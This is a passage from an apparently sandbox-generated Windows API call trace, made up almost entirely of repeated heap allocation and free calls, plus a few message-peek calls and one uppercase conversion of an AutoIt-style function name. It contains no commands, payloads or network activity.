hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.031] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.031] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af338 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af348 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0037.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.033] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 